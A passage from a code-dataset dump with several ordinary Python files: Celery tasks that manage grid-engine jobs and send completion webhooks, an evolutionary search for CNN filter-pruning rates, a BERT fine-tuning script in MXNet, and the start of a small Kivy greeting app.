[:jobs_to_allocate]:\n logger.info(f\"running activate_job(pk={queued_job.pk})\")\n activate_job.delay(pk=queued_job.pk)\n\n # # Allocate *high* priority jobs\n # active_jobs = Job.objects.exclude_imported().high_priority().active()\n # queued_jobs = Job.objects.exclude_imported().high_priority().queued()\n # jobs_in_process = active_jobs.count()\n # logger.info(\n # f\"{jobs_in_process} of {settings.SCC_MAX_HIGH_JOBS} high priority jobs are active\"\n # )\n\n # if jobs_in_process < settings.SCC_MAX_HIGH_JOBS:\n # jobs_to_allocate = settings.SCC_MAX_HIGH_JOBS - jobs_in_process\n # logger.info(f\"{jobs_to_allocate} new high priority jobs were allocated\")\n # for queued_job in queued_jobs[:jobs_to_allocate]:\n # activate_job.delay(pk=queued_job.pk)\n\n # # Allocate *normal* priority jobs\n # active_jobs = Job.objects.exclude_imported().normal_priority().active()\n # queued_jobs = Job.objects.exclude_imported().normal_priority().queued()\n # jobs_in_process = active_jobs.count()\n # logger.info(\n # f\"{jobs_in_process} of {settings.SCC_MAX_NORMAL_JOBS} normal priority jobs are active\"\n # )\n\n # if jobs_in_process < settings.SCC_MAX_NORMAL_JOBS:\n # jobs_to_allocate = settings.SCC_MAX_NORMAL_JOBS - jobs_in_process\n # logger.info(f\"{jobs_to_allocate} new medium priority jobs were allocated\")\n # for queued_job in queued_jobs[:jobs_to_allocate]:\n # activate_job.delay(pk=queued_job.pk)\n\n # # Allocate *low* priority jobs\n # active_jobs = Job.objects.exclude_imported().low_priority().active()\n # queued_jobs = Job.objects.exclude_imported().low_priority().queued()\n # jobs_in_process = active_jobs.count()\n # logger.info(\n # f\"{jobs_in_process} of {settings.SCC_MAX_LOW_JOBS} low priority jobs are active\"\n # )\n\n # if jobs_in_process < settings.SCC_MAX_LOW_JOBS:\n # jobs_to_allocate = settings.SCC_MAX_LOW_JOBS - jobs_in_process\n # logger.info(f\"{jobs_to_allocate} new low priority jobs were allocated\")\n # for queued_job in queued_jobs[:jobs_to_allocate]:\n # activate_job.delay(pk=queued_job.pk)\n\n stop = dt.now()\n logger.info(f\"SCHEDULED_ALLOCATE_JOB took {(stop-start).seconds} seconds\")\n\n\n@task(bind=True, ignore_result=True, max_retries=0)\ndef scheduled_capture_job_output(self: celery.Task) -> None:\n \"\"\"\n Periodically send TARed output directories from Status.COMPLETE & Status.ERROR jobs to web app\n Will also delete those directories from SCC\n Interval determined by settings.CELERY_BEAT_SCHEDULE\n Directory will be based on a setting\n \"\"\"\n\n # We don't want imported jobs, jobs with no input file, or jobs with an output file\n capture_jobs = (\n Job.objects.exclude_imported()\n .exclude(\n input_file__in=[\"\", None],\n )\n .filter(\n status__in=[Status.FINISHED, Status.ERROR],\n output_file__in=[\"\", None],\n last_exception_count__lt=10,\n )\n )\n\n for job in capture_jobs:\n logger.info(f\"Processing Job: {job.uuid}\")\n\n try:\n ftplus_path = Path(\n settings.SCC_FTPLUS_PATH, \"jobs-in-process\", f\"{job.uuid}\"\n )\n scc_job_input_file = f\"{job.input_file.path}\"\n logger.debug(scc_job_input_file)\n\n cmd = [\n \"tar\",\n \"-czf\",\n f\"{scc_job_input_file}\",\n \"-C\",\n f\"{ftplus_path}\",\n \".\",\n ]\n\n logger.debug(f\"File Retrival Command: {cmd}\")\n\n # directory existence check\n if ftplus_path.exists():\n subprocess.run(cmd)\n scc_job_output_file = scc_job_input_file.replace(\n \"jobs_input\", \"jobs_output\"\n )\n\n # Rename our input_file to match where we want our output_file to be\n Path(scc_job_input_file).rename(scc_job_output_file)\n\n job.output_file = scc_job_output_file.replace(\n f\"{settings.MEDIA_ROOT}\", \"\"\n )\n job.save()\n\n # Delete SCC directory\n subprocess.run([\"rm\", \"-rf\", f\"{ftplus_path}\"])\n else:\n raise Exception(f\"ftplus_path path: {ftplus_path} was not found\")\n\n except Exception as e:\n msg = f\"Job status changed to error. Exception: {e}\"\n job.status = Status.ERROR\n job.last_exception = msg\n job.last_exception_at = timezone.now()\n job.last_exception_count = F(\"last_exception_count\") + 1\n job.save()\n JobLog.objects.create(job=job, event=msg)\n logger.exception(msg)\n\n\n@task(bind=True, ignore_result=True, max_retries=0)\ndef scheduled_cleanup_job(self: celery.Task, limit: int = 10_000) -> None:\n \"\"\"\n To avoid overloading our database with old jobs, we cleanup all old jobs\n over, 7 days...\n \"\"\"\n deleted_date = timezone.now() - timedelta(days=7)\n deleted_count, deleted_jobs = Job.objects.filter(\n pk__in=list(\n Job.objects.imported()\n .filter(created__lt=deleted_date)\n .order_by(\"created\")\n .values_list(\"pk\", flat=True)[:limit]\n )\n ).delete()\n logger.info(f\"Deleted Jobs: {deleted_count}, {deleted_jobs}\")\n\n\n@task(bind=True, ignore_result=True, max_retries=0)\ndef scheduled_poll_job(self: celery.Task) -> None:\n \"\"\"\n Checks status of current SCC jobs at a set interval\n Interval determined by settings.CELERY_BEAT_SCHEDULE\n\n Processing of those jobs will be handled by update_jobs()\n \"\"\"\n\n start = dt.now()\n cmd = settings.GRID_ENGINE_STATUS_CMD.split(\" \")\n cmd = ['/usr/local/sge/bin/qstat', '-u','ftsubmit']\n if isinstance(cmd, list):\n job_poll = subprocess.run(cmd, capture_output=True, text=True)\n else:\n job_poll = subprocess.run([cmd], capture_output=True, text=True)\n\n # Capture qstat info as a list of dictionaries\n logger.debug(f\"\\nJOB_POLL.STDOUT{job_poll.stdout}\")\n qstat_output = parse_qstat_output(job_poll.stdout)\n # Update jobs w/ qstat info\n logger.debug(f\"\\nQSTAT_OUTPUT{qstat_output}\")\n logger.info(qstat_output)\n logger.info(cmd)\n\n update_start = dt.now()\n update_jobs(qstat_output)\n update_stop = dt.now()\n logger.info(f\"UPDATE_JOBS took {(update_stop-update_start).seconds} seconds\")\n\n stop = dt.now()\n logger.info(f\"SCHEDULED_POLL_JOB took {(stop-start).seconds} seconds\")\n\n\ndef update_jobs(qstat_output: str) -> None:\n \"\"\"\n Takes input from scheduled_poll_job (a list of dictionaries)\n Parses that and saves the results to job objects in the web app\n Also updates Job.Status on jobs that have Errored or are complete\n Creation and processing of imported job objects is also handled here\n \"\"\"\n\n user, created = User.objects.get_or_create(email=settings.SCC_DEFAULT_EMAIL)\n scc_job_list = []\n # Update all jobs w/ their qstat results\n for row in qstat_output:\n logger.debug(f\"\\nROW IS {row}\")\n try:\n job_id = row[\"job-ID\"]\n job_ja_task_id = (\n row.get(\"ja-task-ID\") if len(row.get(\"ja-task-ID\")) else None\n )\n # job_ja_task_id = (\n # row.get(\"ja-task-ID\")\n # )\n job_state = row[\"state\"]\n job_submitted = f\"{row['submit-start-at']}\".replace(\"/\", \"-\")\n job_submitted = parse(job_submitted)\n updated = False\n \n if job_submitted:\n job_submitted = pytz.timezone(settings.TIME_ZONE).localize(\n job_submitted, is_dst=None\n )\n\n try:\n # Since BU doesn't care about imported jobs\n # Do we went to change this to ONLY update?\n # i see errors for multiple jobs submitted coming from here, i think we should test this without creating entries for non submitted jobs\n qs1 = Job.objects.queued()\n qs2 = Job.objects.active()\n scc_jobs = qs1.union(qs2) #<- this would be before the loop\n ids = [x.sge_task_id for x in scc_jobs] #<- before loop\n # if job_id in ids:\n # job.job_data = row\n # job.job_ja_task_id = job_ja_task_id\n # job.job_state = job_state\n # job.job_submitted = job_submitted\n # job.scc_user = row.get(\"user\")\n # job.save()\n # can we do something like this to not get imported jobs?\n #job, created = Job.objects.get_or_create(\n # sge_task_id=job_id,\n # defaults={\n # \"imported\": True,\n # \"job_data\": row,\n # \"job_ja_task_id\": job_ja_task_id,\n # \"job_state\": job_state,\n # \"job_submitted\": job_submitted,\n # \"status\": Status.ACTIVE,\n # \"user\": user,\n # },\n #)\n #if not created:\n # job.job_data = row\n # job.job_ja_task_id = job_ja_task_id\n # job.job_state = job_state\n # job.job_submitted = job_submitted\n # job.scc_user = row.get(\"user\")\n # job.save()\n scc_job_list.append(int(job_id)) \n if job_id in ids:\n job = Job.objects.get(sge_task_id=job_id)\n job.job_data = row\n job.job_ja_task_id = job_ja_task_id\n job.job_state = job_state\n job.job_submitted = job_submitted\n job.scc_user = row.get(\"user\")\n job.save()\n updated = True\n #job = Job.objects.get(sge_task_id=job_id)\n #job.job_data = row\n #job.job_ja_task_id = job_ja_task_id\n #job.job_state = job_state\n #job.job_submitted = job_submitted\n #job.scc_user = row.get(\"user\")\n #job.save()\n\n except Job.MultipleObjectsReturned:\n logger.warning(f\"Multiple jobs found for {job_id}\")\n logger.debug(f\"Deleting jobs for {job_id}\")\n Job.objects.filter(sge_task_id=job_id).delete()\n\n #job, created = Job.objects.get_or_create(\n # sge_task_id=job_id,\n # defaults={\n # \"imported\": True,\n # \"job_data\": row,\n # \"job_ja_task_id\": job_ja_task_id,\n # \"job_state\": job_state,\n # \"job_submitted\": job_submitted,\n # \"status\": Status.ACTIVE,\n # \"user\": user,\n # },\n #)\n logger.debug(f\"Creating new job {job_id} as {job.uuid}\")\n\n # If an imported job is created, set to Status.ACTIVE & note it's imported\n # Error jobs will be updated later\n #if created:\n if updated:\n # Job.objects.filter(sge_task_id=job_id).update(\n # imported=True, status=Status.ACTIVE\n # )\n #JobLog.objects.create(job=job, event=\"Imported job added to web app\")\n JobLog.objects.create(job=job, event=\"Job updated with qstat info\")\n \n else:\n #JobLog.objects.create(job=job, event=\"Job updated with qstat info\")\n pass\n\n #scc_job_list.append(int(job_id))\n\n except Exception as e:\n logger.exception(f\"Job {job_id} :: {e}\")\n\n # Update status for Error jobs; will also catch imported Error jobs\n error_jobs = Job.objects.exclude(\n status__in=[\n Status.COMPLETE,\n Status.DELETED,\n Status.ERROR,\n ]\n ).filter(job_state=\"Eqw\")\n for job in error_jobs:\n job.status = Status.ERROR\n job.save()\n JobLog.objects.create(\n job=job, event=\"Job status changed to error based on SCC's `Eqw` state\"\n )\n\n # Update status of jobs that have been imported so they get out of our way\n Job.objects.imported().exclude(\n status__in=[\n Status.COMPLETE,\n Status.DELETED,\n Status.ERROR,\n ]\n ).update(status=Status.COMPLETE)\n\n # Update status for Complete jobs\n active_jobs = Job.objects.exclude_imported().active()\n finished_jobs = Job.objects.exclude_imported().finished()\n # Completed SCC jobs show NO result in qstat\n logger.warning(scc_job_list)\n for job in active_jobs:\n if job.sge_task_id not in scc_job_list:\n \n #files = { \n job.status = Status.FINISHED\n job.save()\n JobLog.objects.create(job=job, event=\"Job status changed to finished\")\n\n for job in finished_jobs: \n if bool(job.output_file): \n # If our SCC_WEBHOOK_ENABLED settings is set to True, we\n # will fire off a webhook to a url when Jobs have been\n # successfully completed.\n job.status = Status.COMPLETE\n job.save()\n JobLog.objects.create(job=job, event=\"Job status changed to complete\") \n if getattr(settings, \"SCC_WEBHOOK_ENABLED\", False):\n send_webhook.delay(pk=job.pk)\n\n\n@task(bind=True, ignore_result=True)\ndef send_webhook(self: celery.Task, *, pk: typing.Union[str, uuid.UUID]):\n try:\n job = Job.objects.get(pk=pk)\n try:\n # build our webhook url\n url = settings.SCC_WEBHOOK_COMPLETED_JOB_URL.format(job.pk)\n msg = f\"Sending Job {job.pk} to {url}\"\n logging.info(msg)\n JobLog.objects.create(job=job, event=msg)\n\n # get our webhook auth token\n token_auth = TokenAuth(settings.SCC_WEBHOOK_COMPLETED_JOB_API_TOKEN)\n\n # prepare our data to JSON and send...\n job_serializer = JobSerializer(job)\n # job_serializer.is_valid()\n data = job_serializer.data\n\n if Path(job.output_file.path).exists():\n files = {\n \"ftmap_results_tar_file\": Path(job.output_file.path).open(\"rb\")\n }\n else:\n files = {}\n\n requests.post(url, auth=token_auth, data=data, files=files)\n requests.raise_for_status()\n\n except Exception as e:\n logger.warning(f\"Job {pk} errored. {e}\")\n\n except Job.DoesNotExist:\n logger.warning(f\"Job {pk} does not exist. We can not send \")\n\n\n@task(bind=True, ignore_result=True)\ndef update_job_priority(\n self: celery.Task, *, pk: typing.Union[str, uuid.UUID], new_priority: str\n) -> None:\n \"\"\"\n Update Job.priority\n Current assumption: 3 priority levels: Low/Normal/High\n Due to design changes, this task isn't in use at 2021-06-01\n It is tested by test_update_job_priority\n \"\"\"\n try:\n job = Job.objects.get(pk=pk)\n job.priority = new_priority\n job.save()\n\n JobLog.objects.create(job=job, event=f\"Job priority changed to {new_priority}\")\n\n except Job.DoesNotExist:\n logger.warning(f\"Job {pk} does not exist\")\n","repo_name":"vajda-lab/scc-api","sub_path":"src/jobs/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":23540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20355820090","text":"import os\nimport math\nimport random\nimport numpy as np\nimport argparse\n\nimport torch\nimport torch.nn as nn\nimport copy\n\n\nimport sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport torch_pruning as tp\nfrom filter_pruning.torch_pruning.pruning import filter_pruning_random\nfrom fp_utils.utils import *\n\n\n\ndef softmax_numpy(x):\n e_x = np.exp(x.astype(float) - np.max(x))\n return e_x / e_x.sum()\n\n\ndef uniform_normal_init(loc, scale, size): \n a = np.random.normal(loc=loc,scale=scale,size=size)\n mask = a <= loc\n b = np.random.uniform(0.001,loc,size)\n out = a*(1-mask)+b*mask\n return out\n\ndef mix_normal_init(loc, size, max_value):\n out = []\n scale1 = (max_value-loc)/3.0\n scale2 = (loc-0.001)/3.0\n cnt = 0\n while cnt < size:\n a = np.random.normal(loc=loc,scale=scale1)\n if a > 0.1:\n a = max_value if (a > max_value) else a\n out.append(a)\n else:\n while True:\n b=np.random.normal(loc=loc,scale=scale2)\n if b < 0.1 and b>0:\n out.append(b)\n break\n cnt+=1\n out = np.array(out)\n return out\n\ndef saturation_value(a, min, max):\n m1 = a < min\n # a = (0.5/args.max_PARAMs)*m1+a*(1-m1)\n a = min*m1+a*(1-m1)\n m2 = a > max\n a = max*m2+a*(1-m2)\n return a\n\n\ndef random_can_fp(model, max_FLOPs_FP, max_PARAMs_FP, target_params_fp, target_flops_fp, \n input_size, num, num_states, total_flops, total_params):\n print('random select ........', flush=True)\n candidates = []\n candidates_int = []\n # loop_num = 0\n while len(candidates)<num:\n if max_FLOPs_FP == 0 and max_PARAMs_FP == 0:\n can = np.zeros(num_states+2)\n can[-1] = total_flops\n can[-2] = total_params\n print('pruning rate = 0') \n else:\n # if loop_num % 20==0:\n # print('loop start: %d' % loop_num)\n # if(loop_num > 200):\n # break \n # loop_num += 1\n # # uniform random init\n # high = 2.0/max(max_PARAMs_FP,max_FLOPs_FP)\n # can = np.random.uniform(0.01,high,num_states+2)\n\n # ## uniform normal init\n # # mu = 1/max(max_PARAMs_FP,max_FLOPs_FP)\n # mu = max(max_PARAMs_FP,max_FLOPs_FP)\n # sigma = (0.5-mu) / 3.0\n # can = uniform_normal_init(mu, sigma, num_states+2)\n\n # # # mix normal_init\n # loc = 1.0/max(max_PARAMs_FP,max_FLOPs_FP)\n # can = mix_normal_init(loc,num_states+2,0.99)\n\n # # gamma init\n loc = max(max_PARAMs_FP, max_FLOPs_FP)\n # can = np.random.gamma(loc*8.0, 0.125, num_states + 2)\n can = np.random.gamma(loc*8.0, 0.125, num_states + 2)\n mask1 = can >= 0.9999\n mask2 = can <= 0.0001\n can = mask1 * 0.9999 + (1 - mask1) * can\n can = mask2 * 0.0001 + (1 - mask2) * can\n\n t_can = tuple(can[:-2])\n # print(can[:-2].tolist())\n\n # model = models.__dict__[args.arch]()\n\n\n fp_model = filter_pruning_random(model,torch.randn(1,3,input_size,input_size),output_transform=None,pruning_rates=t_can)\n\n layer_flops = calc_model_flops(fp_model, input_size, mul_add=False)\n sparse_total_flops = sum(layer_flops)\n layer_params = calc_model_parameters(fp_model)\n sparse_total_params = sum(layer_params)\n # print('pruning rate (flops): ', 1.0-sparse_total_flops/total_flops)\n # print('pruning rate (params): ', 1.0-sparse_total_params/total_params)\n\n if max_FLOPs_FP == 0 and max_PARAMs_FP !=0:\n if 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n elif max_FLOPs_FP != 0 and max_PARAMs_FP ==0:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1:\n continue\n else:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1 or 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n\n can[-1] = sparse_total_flops\n can[-2] = sparse_total_params\n\n # compare difference\n t_can_int = [math.ceil(i*100.0) for i in t_can]\n\n\n if t_can_int in candidates_int:\n continue\n else:\n candidates_int.append(t_can_int)\n\n # print(total_flops/sparse_total_flops)\n print('number of candidates: ', len(candidates))\n candidates.append(can.tolist())\n\n # print(len(candidates))\n # print(len(candidates_int))\n\n # print('random_num = {}'.format(len(candidates)), flush=True)\n return candidates\n\n# mutation operation in evolution algorithm\ndef get_mutation_fp(model, max_FLOPs_FP, max_PARAMs_FP, target_params_fp, target_flops_fp, \n input_size, epoch, keep_top_candidates, top_candidates_score, num_states, mutation_num, \n m_prob, strength, total_flops, total_params):\n \n print('mutation ......', flush=True)\n res = []\n candidates_int = []\n global_candidates_int = []\n\n for candidator in keep_top_candidates:\n global_candidates_int.append([math.ceil(i*100.0) for i in candidator[:-2]])\n \n k = len(keep_top_candidates)\n iter = 0\n max_iters = 10*mutation_num\n # top_candidates_score = top_candidates_score / 100.0\n top_k_p = softmax_numpy(top_candidates_score)\n while len(res)<mutation_num and iter<max_iters:\n # while len(res)<mutation_num:\n\n if max_FLOPs_FP == 0 and max_PARAMs_FP == 0:\n can = np.zeros(num_states+2)\n can[-1] = total_flops\n can[-2] = total_params \n res.append(can.tolist()) \n else:\n # ids = np.random.choice(k, mutation_num,replace=False,p=top_k_p)\n # ids = np.random.choice(k, mutation_num,replace=False)\n # ids = np.random.choice(k, mutation_num,p=top_k_p)\n ids = np.random.choice(k, mutation_num)\n # print(ids)\n select_seed = np.array([keep_top_candidates[id] for id in ids])\n # if epoch < 50:\n # alpha = np.random.uniform(0,1,num_states+2)\n # elif epoch < 100:\n # alpha = np.random.uniform(0.25,0.75,num_states+2)\n # elif epoch < 120:\n # alpha = np.random.uniform(0.35,0.65,num_states+2)\n # alpha = np.random.uniform(0,1,num_states+2)\n alpha = np.random.normal(loc=0.5,scale=0.1,size=num_states+2)\n is_m = np.random.choice(np.arange(0,2), (mutation_num, num_states+2), p=[1-m_prob, m_prob]).astype(np.float32)\n # is_m[:,0] = np.random.choice(np.arange(0,2),len(is_m[:,0]) , p=[0.6, 0.4]).astype(np.float32)\n # is_m[:,-1] = np.random.choice(np.arange(0,2),len(is_m[:,-1]) , p=[0.6, 0.4]).astype(np.float32)\n # select_list = select_seed*(1.0-is_m)+(1.0-select_seed)*is_m\n mask1 = alpha >= 1\n mask2 = alpha <= 0\n alpha = alpha*(1-mask1)+0.5*(mask1) \n alpha = alpha*(1-mask2)+0.5*(mask2)\n mask = alpha < 0.5\n beta = (pow((2*alpha),(1/strength))-1)*mask + (1-pow((2*(1-alpha)),(1/strength)))*(1-mask)\n select_list = select_seed+beta*is_m\n select_list = saturation_value(select_list, 0.0001, 0.9999)\n iter += 1\n cnt = 0\n for can in select_list:\n cnt = cnt + 1\n sum_mask = sum(is_m[cnt-1])\n t_can = tuple(can[:-2])\n\n # model = models.__dict__[args.arch]()\n\n fp_model = filter_pruning_random(model,torch.randn(1,3,input_size,input_size), output_transform=None, pruning_rates=t_can)\n\n layer_flops = calc_model_flops(fp_model,input_size,mul_add=False)\n sparse_total_flops = sum(layer_flops)\n layer_params = calc_model_parameters(fp_model)\n sparse_total_params = sum(layer_params)\n\n if max_FLOPs_FP == 0 and max_PARAMs_FP !=0:\n if 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n elif max_FLOPs_FP != 0 and max_PARAMs_FP ==0:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1:\n continue\n else:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1 \\\n or 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n can[-1] = sparse_total_flops\n can[-2] = sparse_total_params\n # print(total_flops/sparse_total_flops)\n # print(total_params/sparse_total_params)\n\n # compare difference\n t_can_int = [math.ceil(i*100.0) for i in t_can]\n if (t_can_int in candidates_int) or (t_can_int in global_candidates_int):\n continue\n else:\n candidates_int.append(t_can_int)\n\n res.append(can)\n if len(res)==mutation_num:\n break\n print('mutation_num = {}'.format(len(res)), flush=True)\n return res\n\n# crossover operation in evolution algorithm\ndef get_crossover_fp(model, max_FLOPs_FP, max_PARAMs_FP, target_params_fp, target_flops_fp, \n input_size, keep_top_candidates, top_candidates_score, num_states, crossover_num, total_flops,total_params):\n \n print('crossover ......', flush=True)\n res = []\n candidates_int = []\n global_candidates_int = []\n for candidator in keep_top_candidates:\n global_candidates_int.append([math.ceil(i*100.0) for i in candidator[:-2]])\n \n k = len(keep_top_candidates)\n # top_candidates_score = top_candidates_score / 100.0\n top_k_p = softmax_numpy(top_candidates_score)\n iter = 0\n max_iters = 10 * crossover_num\n while len(res)<crossover_num and iter<max_iters:\n # while len(res)<crossover_num:\n\n if max_FLOPs_FP == 1 and max_PARAMs_FP == 1:\n can = np.zeros(num_states+2)\n can[-1] = total_flops\n can[-2] = total_params \n res.append(can.tolist()) \n else:\n # id1, id2 = np.random.choice(k, 2, replace=False)\n # id1, id2 = np.random.choice(k, 2, replace=False,p=top_k_p)\n # print([id1,id2])\n # p1 = keep_top_candidates[id1]\n # p2 = keep_top_candidates[id2]\n id1 = np.random.choice(k, 1, p=top_k_p)\n id2 = np.random.choice(k, 1)\n # print([id1[0],id2[0]])\n p1 = keep_top_candidates[id1[0]]\n p2 = keep_top_candidates[id2[0]]\n\n # recombination\n alpha = np.random.rand(len(p1))\n can = p1*alpha + p2*(1.0-alpha)\n\n # alpha = np.random.uniform(-1, 1, len(p1))\n # can = p1+alpha*(p1-p2)\n\n can = saturation_value(can, 0.0001, 0.9999)\n # ## Discrete recombination\n # mask = np.random.randint(low=0, high=2, size=(num_states+2)).astype(np.float32)\n # can = p1*mask + p2*(1.0-mask)\n iter += 1\n t_can = tuple(can[:-2])\n\n # model = models.__dict__[args.arch]()\n\n fp_model = filter_pruning_random(model, torch.randn(1,3,input_size,input_size),output_transform=None,pruning_rates=t_can)\n\n layer_flops = calc_model_flops(fp_model,input_size,mul_add=False)\n sparse_total_flops = sum(layer_flops)\n layer_params = calc_model_parameters(fp_model)\n sparse_total_params = sum(layer_params)\n\n if max_FLOPs_FP == 0 and max_PARAMs_FP !=0:\n if 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n elif max_FLOPs_FP != 0 and max_PARAMs_FP ==0:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1:\n continue\n else:\n if 1.0-sparse_total_flops/total_flops < target_flops_fp or 1.0-sparse_total_flops/total_flops > target_flops_fp+0.1 or \\\n 1.0-sparse_total_params/total_params < target_params_fp or 1.0-sparse_total_params/total_params > target_params_fp+0.1:\n continue\n\n can[-1] = sparse_total_flops\n can[-2] = sparse_total_params\n # print(total_flops/sparse_total_flops)\n # print(total_params/sparse_total_params)\n\n # compare difference\n t_can_int = [math.ceil(i*100.0) for i in t_can]\n if (t_can_int in candidates_int) or (t_can_int in global_candidates_int):\n continue\n else:\n candidates_int.append(t_can_int)\n\n res.append(can)\n if len(res)==crossover_num:\n break\n print('crossover_num = {}'.format(len(res)), flush=True)\n return res\n","repo_name":"MAS0NM/YOLO","sub_path":"filter_pruning/search/search_filter_pruning.py","file_name":"search_filter_pruning.py","file_ext":"py","file_size_in_byte":13645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13270873882","text":"import io\nimport random\nimport os\n\nimport pandas as pd\nimport numpy as np\n\nimport mxnet as mx\nimport gluonnlp as nlp\nfrom bert import data, model\n\nDATA_PATH = \"data\"\n\ntrain = pd.read_csv(os.path.join(DATA_PATH, \"train.csv\"))\ntest = pd.read_csv(os.path.join(DATA_PATH, \"test.csv\"))\n\nnp.random.seed(100)\nrandom.seed(100)\nmx.random.seed(10000)\n# change `ctx` to `mx.cpu()` if no GPU is available.\nctx = mx.cpu()\n\nbert_base, vocabulary = nlp.model.get_model(\n 'bert_12_768_12',\n dataset_name='book_corpus_wiki_en_uncased',\n pretrained=True,\n ctx=ctx,\n use_pooler=True,\n use_decoder=False,\n use_classifier=False)\nprint(bert_base)\n\nbert_classifier = nlp.model.BERTClassifier(bert_base,\n num_classes=2,\n dropout=0.1)\n# only need to initialize the classifier layer.\nprint(\"Initializing classifier...\")\nbert_classifier.classifier.initialize(init=mx.init.Normal(0.02), ctx=ctx)\nbert_classifier.hybridize(static_alloc=True)\n\n# softmax cross entropy loss for classification\nloss_function = mx.gluon.loss.SoftmaxCELoss()\nloss_function.hybridize(static_alloc=True)\n\nmetric = mx.metric.Accuracy()\n\n## imputation\nprint(\"Imputing...\")\ntrain = train.fillna(\"missing\")\ntest = test.fillna(\"missing\")\n\nbert_tokenizer = nlp.data.BERTTokenizer(vocabulary, lower=True)\n\n# The maximum length of an input sequence\nmax_len = 256\n\n# The labels for the two classes [(0 = not similar) or (1 = similar)]\nall_labels = [0, 1]\n\n# whether to transform the data as sentence pairs.\n# for single sentence classification, set pair=False\n# for regression task, set class_labels=None\n# for inference without label available, set has_label=False\npair = True\nprint(\"Transformin...\")\ntransform = data.transform.BERTDatasetTransform(bert_tokenizer,\n max_len,\n class_labels=all_labels,\n has_label=True,\n pad=True,\n pair=False)\n\ntrain_df = train.drop(columns=\"id\")\ntrain_df[\"full_text\"] = train_df.apply(\n lambda x: f\"{x['text']} at {x['location']} for {x['keyword']}\", axis=1)\ndata_list = []\nfor _, line in train_df.iterrows():\n line_trans = transform(line[[\"full_text\", \"target\"]])\n data_list.append(line_trans)\n\n\n##Fine Tuning\n\n# The hyperparameters\nprint(\"starting tunning...\")\nbatch_size = 32\nlr = 5e-6\n\n# The FixedBucketSampler and the DataLoader for making the mini-batches\ntrain_sampler = nlp.data.FixedBucketSampler(lengths=[int(item[1]) for item in data_list],\n batch_size=batch_size,\n shuffle=True)\nbert_dataloader = mx.gluon.data.DataLoader(data_list, batch_sampler=train_sampler)\n\ntrainer = mx.gluon.Trainer(bert_classifier.collect_params(), 'adam',\n {'learning_rate': lr, 'epsilon': 1e-9})\n\n# Collect all differentiable parameters\n# `grad_req == 'null'` indicates no gradients are calculated (e.g. constant parameters)\n# The gradients for these params are clipped later\nparams = [p for p in bert_classifier.collect_params().values() if p.grad_req != 'null']\ngrad_clip = 1\n\n# Training the model with only three epochs\nlog_interval = 4\nnum_epochs = 3\nfor epoch_id in range(num_epochs):\n metric.reset()\n step_loss = 0\n for batch_id, (token_ids, valid_length, segment_ids, label) in enumerate(bert_dataloader):\n with mx.autograd.record():\n # Load the data to the GPU\n token_ids = token_ids.as_in_context(ctx)\n valid_length = valid_length.as_in_context(ctx)\n segment_ids = segment_ids.as_in_context(ctx)\n label = label.as_in_context(ctx)\n # Forward computation\n out = bert_classifier(token_ids, segment_ids, valid_length.astype('float32'))\n ls = loss_function(out, label).mean()\n\n # And backwards computation\n ls.backward()\n\n # Gradient clipping\n trainer.allreduce_grads()\n nlp.utils.clip_grad_global_norm(params, 1)\n trainer.update(1)\n print(\"gradient clipped\")\n step_loss += ls.asscalar()\n metric.update([label], [out])\n\n # Printing vital information\n print('[Epoch {} Batch {}/{}] loss={:.4f}, lr={:.7f}, acc={:.3f}'\n .format(epoch_id, batch_id + 1, len(bert_dataloader),\n step_loss / log_interval,\n trainer.learning_rate, metric.get()[1]))\n step_loss = 0\n\n","repo_name":"othmanefc/bert-disaster","sub_path":"exploring.py","file_name":"exploring.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15554592416","text":"from kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.image import Image\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\n\n\nclass sayHey(App):\n\tdef build(self):\n\t\t# returns a window object with all it's widgets\n\t\tself.window = GridLayout()\n\t\tself.window.cols = 1\n\t\tself.window.size_hint = (0.6, 0.7)\n\t\tself.window.pos_hint = {\"center_x\": 0.5, \"center_y\": 0.5}\n\n\t\tself.window.add_widget(Image(source=\"logo.jpg\"))\n\n\t\tself.greeting = Label(\n\t\t\ttext=\"What's your name?\",\n\t\t\tfont_size=18,\n\t\t\tcolor='#76b5c5'\n\t\t)\n\t\tself.window.add_widget(self.greeting)\n\n\t\tself.user = TextInput(\n\t\t\tmultiline=False,\n\t\t\tpadding_y=(20, 20),\n\t\t\tsize_hint=(1, 0.5)\n\t\t)\n\n\t\tself.window.add_widget(self.user)\n\n\t\tself.button = Button(\n\t\t\ttext=\"Send\",\n\t\t\tsize_hint=(1, 0.5),\n\t\t\tbold=True,\n\t\t\tbackground_color='#76b5c5',\n\t\t)\n\t\tself.button.bind(on_press=self.callback)\n\t\tself.window.add_widget(self.button)\n\n\t\treturn self.window\n\n\tdef callback(self, instance):\n\t\tself.greeting.text = \"Hello \" + self.user.text + \"!\"\n\n\nif __name__ == 